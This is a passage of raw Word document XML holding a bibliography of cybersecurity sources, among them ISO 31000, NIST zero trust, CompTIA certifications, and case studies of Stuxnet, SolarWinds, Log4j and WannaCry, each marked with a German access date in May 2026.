          <w:t xml:space="preserve">https://www.computer.org/csdl/magazine/sp/2016/04/msp2016040076/13rRUyY28WB</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Cyber GRC Trends for 2026: AI, IT/OT Risk | Blog - Metricstream, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId44">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.metricstream.com/blog/gtop-cyber-grc-trends-ai-it-ot-risk-continuous-compliance.html</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CAS-004 Questions &amp; Answers CompTIA Advanced Security Practitioner (CASP+) - CyberProtex, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId45">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.cyberprotex.com/uploads/2/4/5/3/24530641/cas-004-qs-and-as-testking_1.pdf</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Security X - Certification Course - QA, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId46">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.qa.com/en-us/course-catalogue/courses/comptia-security-x-comsecx/</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Cybersecurity Frameworks and Information Security Standards—A Review and Comprehensive Overview - MDPI, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId47">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.mdpi.com/2079-9292/11/14/2181</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the power of ISO 31000: A strategic guide to risk management, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId48">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://risktrainingprofessionals.com/blog/2025/03/21/unlocking-the-power-of-iso-31000-a-strategic-guide-to-risk-management/</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Basics of ISO 31000 – Risk Management - Riskonnect, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId49">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://riskonnect.com/business-continuity-resilience/the-basics-of-iso-31000-risk-management/</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31000 Risk Management Foundation Course | DNV, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId50">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.dnv.com/training/iso-31000-risk-management-foundation-course-6961/</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 Data Breach Case Study: Causes and Lessons Learned - Breachsense, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId51">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.breachsense.com/blog/target-data-breach/</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“Kill Chain” Analysis of the 2013 Target Data Breach - Senate Commerce Committee, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId52">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.commerce.senate.gov/wp-content/uploads/media/doc/2014%200325%20Target%20Kill%20Chain%20Analysis.pdf</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Case Security Breach at Target - Journal of Information Systems Education, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId53">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://jise.org/Volume29/n1/JISEv29n1p11.pdf</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ISC2 ISSAP Domain 1: Architect for Governance, Compliance and Risk Management, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId54">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.infosectrain.com/blog/isc2-issap-domain-1-architect-for-governance-compliance-and-risk-management</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Security+ 701 Exam Objectives: The Ultimate Prep Guide - Destination Certification, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId55">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://destcert.com/resources/security-plus-701-objectives/</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 Trust Architecture | NIST - National Institute of Standards and Technology, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId56">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.nist.gov/publications/zero-trust-architecture</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 Trust Architecture - NIST Technical Series Publications, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId57">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://nvlpubs.nist.gov/nistpubs/specialpublications/NIST.SP.800-207.pdf</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a Zero Trust Architecture: Full Document - NIST Pages, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId58">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://pages.nist.gov/zero-trust-architecture/</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Theory and Application of Zero Trust Security: A Brief Survey - PMC, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId59">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://pmc.ncbi.nlm.nih.gov/articles/PMC10742574/</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Stuxnet Analysis | ENISA - European Union, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId60">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.enisa.europa.eu/news/enisa-news/stuxnet-analysis</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Stuxnet - Malwarebytes, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId61">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.malwarebytes.com/stuxnet</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recommendations for U.S. policy on critical infrastructure cyber defense derived from the Stuxnet attack - National Security Archive, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId62">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://nsarchive.gwu.edu/sites/default/files/documents/3173339/Document-07.pdf</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Stuxnet Malware Mitigation (Update B) - CISA, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId63">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.cisa.gov/news-events/ics-advisories/icsa-10-238-01b</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Stuxnet - CCDCOE, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId64">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://ccdcoe.org/uploads/2018/10/Falco2012_StuxnetFactsReport.pdf</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Meltdown and Spectre, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId65">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://meltdownattack.com/</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Meltdown and Spectre Side-Channel Vulnerability Guidance | CISA, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId66">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.cisa.gov/news-events/alerts/2018/01/04/meltdown-and-spectre-side-channel-vulnerability-guidance</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Spectre and Meltdown: What you Need to Know | NCC Group, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId67">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.nccgroup.com/research/spectre-and-meltdown-what-you-need-to-know/</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Meltdown and Spectre | NCyTE Center, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId68">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.ncyte.net/academia/faculty/cybersecurity-curriculum/college-curriculum/interactive-lessons/meltdown-and-spectre</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you ready for the CASP+ CAS-004 Exam? - Intellectual Point, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId69">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://intellectualpoint.com/are-you-ready-for-the-casp-cas-004-exam/</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1: the Solar Winds hack - FutureLearn, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId70">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.futurelearn.com/info/courses/security-by-design/0/steps/390395</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SolarWinds: State-sponsored global software supply chain attack, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId71">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://samsik.dk/wp-content/uploads/2026/01/20211105_CFCS-solarwinds-report-EN.pdf</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SolarWinds Cyberattack Demands Significant Federal and Private-Sector Response (infographic) | U.S. GAO, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId72">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.gao.gov/blog/solarwinds-cyberattack-demands-significant-federal-and-private-sector-response-infographic</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SolarWinds Attack: A Complete Analysis and the Path Forward - TerraZone, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId73">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://terrazone.io/solarwinds-attack/</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Log4j Vulnerability? - IBM, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId74">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.ibm.com/think/topics/log4j</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Log4j/Log4Shell Vulnerability | CrowdStrike, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId75">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.crowdstrike.com/en-us/cybersecurity-101/exposure-management/log4j-vulnerability/</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Log4j Vulnerability Guidance - CISA, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId76">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.cisa.gov/news-events/news/apache-log4j-vulnerability-guidance</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Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021-44228) (Updated) - Palo Alto Networks Unit 42, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId77">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/</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Log4j Vulnerability (CVE-2021-44228) Explained: Critical Java Logging Flaw &amp; Remote Code Execution Risk | Kusari®, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId78">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.kusari.dev/learning-center/log4j</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Biggest Cyber Attacks Year by Year - 2021 to 2026 - British Assessment Bureau, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId79">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://amtivo.com/uk/standards/cyber-essentials/insights/the-biggest-cyberattacks-by-year/</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SecurityX (CAS-005) Certification Sample Questions - EDUSUM, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId80">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.edusum.com/comptia/comptia-securityx-cas-005-certification-sample-questions</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CySA+ CS0-003 Exam Objectives Overview | PDF | Computer Security - Scribd, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId81">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.scribd.com/document/896304683/11563-CySA-CS0-003-Exam-Objectives</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WannaCry Ransomware Case Study | PDF - Scribd, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId82">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.scribd.com/document/946312959/Case-Study-on-WannaCry-Ransomware</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was the WannaCry ransomware attack? - Cloudflare, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId83">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.cloudflare.com/learning/security/ransomware/wannacry-ransomware/</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PRECURSOR ANALYSIS REPORT: WANNACRY RANSOMWARE ATTACK ON RENAULT-NISSAN 2017 - CYOTE, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId84">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://cyote.inl.gov/content/uploads/24/2025/12/CyOTE-Case-Study_WannaCry.pdf</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Significant Cyber Incidents | Strategic Technologies Program - CSIS, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId85">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.csis.org/programs/strategic-technologies-program/significant-cyber-incidents</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Stackable Certifications - CompTIA, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId86">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.comptia.org/en-us/resources/stackables/</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CompTIA Cybersecurity Career Pathway: Employable Skills Found Here, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId87">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.comptia.org/en-us/blog/the-comptia-cybersecurity-career-pathway-employable-skills-found-here/</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Certification Path: Complete Career Guide 2026 - LearnZapp, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId88">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.learnzapp.com/blog/comptia-certification-path/</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on the CompTIA Security+ Exam?, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId89">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
